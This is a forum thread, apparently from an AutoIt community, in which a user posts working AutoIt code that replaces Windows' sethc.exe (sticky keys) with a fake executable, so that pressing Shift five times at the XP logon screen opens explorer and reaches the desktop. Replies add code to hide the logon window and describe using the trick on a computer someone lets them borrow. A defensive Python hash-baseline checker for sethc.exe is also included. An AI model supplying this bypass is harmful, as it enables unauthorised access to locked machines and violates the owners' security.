JellyFish666

WinHack

10 posts in this topic

#1 ·  Posted (edited)

I am not sure if I am allowed to share it; if not, I shouldn't post my other scripts :P

What does this do?

- well, this is an exploit that takes advantage of the Windows "sticky keys" function (note: sticky keys needs to be turned on)

How does this work?

- when you're logged off on your computer the "sticky keys" function is still active, so by replacing this file with a fake "sticky keys" program you can do whatever you want WOW!

Give me an Example

- Run the Injector.au3

- click Enable

- Logoff (where you enter your password)

- hit shift x5 (may be more) if it doesn't work you need to enable "sticky keys"

then the Attack.au3 will launch explorer.exe, and if you hit CTRL-ALT-DELETE it should show you another type of window asking for a password (old school login), but just let it sit there and don't touch it and you should be able to access your desktop...

DO NOT FORGET TO DISABLE - my attack.au3 only opens up explorer but if you add your own script and "sticky key" the attack will launch...

ONLY TESTED ON WINXP

Injector.au3

#include <GUIConstantsEx.au3>
#include <WindowsConstants.au3>

; Keep a backup of the original sethc.exe next to the script before anything is replaced
If Not FileExists(@ScriptDir & "\Real.exe") Then
    FileCopy(@HomeDrive & "\Windows\System32\sethc.exe", @ScriptDir & "\Real.exe")
EndIf

$Restore = GUICreate("Restore", 200, 25)
$Enable = GUICtrlCreateButton("Enable", 0, 0, 100, 25, 0)
$Disable = GUICtrlCreateButton("Disable", 100, 0, 100, 25, 0)
GUISetState(@SW_SHOW)

While 1
    $Msg = GUIGetMsg()
    Switch $Msg
        Case $GUI_EVENT_CLOSE
            Exit
        Case $Enable
            ; Swap in Fake.exe under the sethc.exe name (third argument 1 = overwrite)
            GUICtrlSetState($Enable, $GUI_DISABLE)
            FileDelete(@HomeDrive & "\Windows\System32\sethc.exe")
            FileCopy(@ScriptDir & "\Fake.exe", @HomeDrive & "\Windows\System32\sethc.exe", 1)
            Exit
        Case $Disable
            ; Put the backed-up original back
            GUICtrlSetState($Disable, $GUI_DISABLE)
            FileDelete(@HomeDrive & "\Windows\System32\sethc.exe")
            FileCopy(@ScriptDir & "\Real.exe", @HomeDrive & "\Windows\System32\sethc.exe", 1)
            Exit
    EndSwitch
WEnd

Attack.au3

Run("Explorer.exe")

I changed the pictures a bit but they will give you an idea


TaskBar on log on screen and if you push CTRL-ALT-DELETE you will get your desktop :P


I hid my icons of course for safety reasons

Edited by JellyFish666
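As an added example from the defender's side (this is not code from the thread), a small Python baseline check that records the SHA-256 of sethc.exe on a known-good system and later reports whether the file under that name has been replaced or removed, which is exactly what the Enable button above does to it. The System32 directory and the file contents in the demo are constructed stand-ins; on a real host the directory would be %SystemRoot%\System32.

```python
import hashlib
import tempfile
from pathlib import Path

# Only the binary the thread swaps is watched; extend WATCHED with other
# logon-screen helpers you want under the same baseline if you wish.
WATCHED = ("sethc.exe",)

def sha256_of(path: Path) -> str:
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def take_baseline(system_dir: Path) -> dict:
    """Record name -> SHA-256 for each watched binary present on a known-good system."""
    return {n: sha256_of(system_dir / n) for n in WATCHED if (system_dir / n).is_file()}

def verify(system_dir: Path, baseline: dict) -> dict:
    """Compare the current files with the baseline: 'ok', 'modified' or 'missing'."""
    status = {}
    for name, expected in baseline.items():
        p = system_dir / name
        if not p.is_file():
            status[name] = "missing"
        elif sha256_of(p) != expected:
            status[name] = "modified"   # a different executable now sits under that name
        else:
            status[name] = "ok"
    return status

def demo() -> dict:
    """Constructed walk-through: clean system, then the swap the injector performs, then deletion."""
    with tempfile.TemporaryDirectory() as d:
        sysdir = Path(d) / "System32"        # stand-in for %SystemRoot%\System32
        sysdir.mkdir()
        target = sysdir / "sethc.exe"
        target.write_bytes(b"MZ original accessibility helper (constructed sample)")
        baseline = take_baseline(sysdir)
        clean = verify(sysdir, baseline)
        target.write_bytes(b"MZ Fake.exe dropped in its place (constructed sample)")
        swapped = verify(sysdir, baseline)
        target.unlink()
        removed = verify(sysdir, baseline)
    return {"clean": clean, "swapped": swapped, "removed": removed}

if __name__ == "__main__":
    print(demo())
```

Run the baseline step once from a trusted state and store the dict somewhere the machine's users cannot write; re-running verify on a schedule turns the replacement described in this post into a logged "modified" event.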




I just gave this a try and I have to admit, scary and cool.

The File Protection complains about replacing the file. Pressing Shift 5 times does indeed initialize Explorer while the system is "Locked". It does not however place focus on Explorer, as the locked screen is still dominant. I'm sure this can be somehow worked around.

I see this example as demonstrating a possible security risk to Windows: to possibly allow a passerby to "Shift" their way into a locked system, as an example. I don't consider this a pressing matter, as the system must already be compromised to install this hack, thus making this exploit more of a novelty than a genuine threat.

I'm running this on an XP SP2 x86 system with up to date system patches.


--- TTFN


#3 ·  Posted (edited)

How about you rename it as a "Proof-of-Concept". Because we know you would never actually use this. Other than that, good job on the exploit.

Edit: As far as the actual exploit goes, I don't see any risk at all. Basically the point of hacking is to get your code running on their machine. But if you can get an executable all the way to their system folders then you can just put it in their startup folder. Or something else. On another note however, I could see this being useful as a fun way to start up a launcher program you make or something similar.

Edited by BillLuvsU



Could you close the winlogin window?

Just tried it... caused the system to BSOD and reboot.


--- TTFN


Hi

FileDelete(@HomeDrive & "\Windows\System32\sethc.exe")

Better to write: FileDelete(@SystemDir & "\sethc.exe")

Bye ... :P




#7 ·  Posted (edited)

To bypass the screen once you see your Taskbar push "Ctrl-Alt-Delete" and Success

I just called it a hack, and people misuse that word; I was meaning a different kind of hacker. And yes, this could be good and bad, but I only see good coming from it. I mean sure, you could write a virus, but AutoIt doesn't really have a way of running unless your virus activates on "Sticky Keys" lol

Replacing the @HomeDrive macro is smart; didn't think of it at the time. Started this short project early in the morning with no sleep.

The File Protection complains about replacing the file

- what OS

- what Anti Virus

- what file protection (windows?)

A good use, and maybe shouldn't be tried, but would be nice... if someone is letting you use their computer, enable this script and you can access their computer. You are sort of limited because of the log on screen (I know how to disable it but I'm not releasing that; I wasn't even going to release this...)

Could you close the winlogin window?

Just tried it... caused the systems to BSOD and reboot.

lol yes it takes more than killing processes at least the way I do it...

{==Edited==}

Last time I'll edit this post lol. I just got back from work, but later I might show a good example of using this; I got lots of ideas

Edited by JellyFish666


can you HIDE the login window? :P




can you HIDE the login window? :P

better yet you can disable it :P


#10 ·  Posted (edited)

WinSetState("Log on to Windows","",@SW_HIDE)

WinSetState("Log on to Windows","",@SW_DISABLE) ;Don't use DISABLE... It leaves the window apparent, and simply disabled input to that window...

Either of these should work seamlessly... :P

I'm for helping people... Even if it really isn't 'helping'.. :P

Edited by BinaryBrother

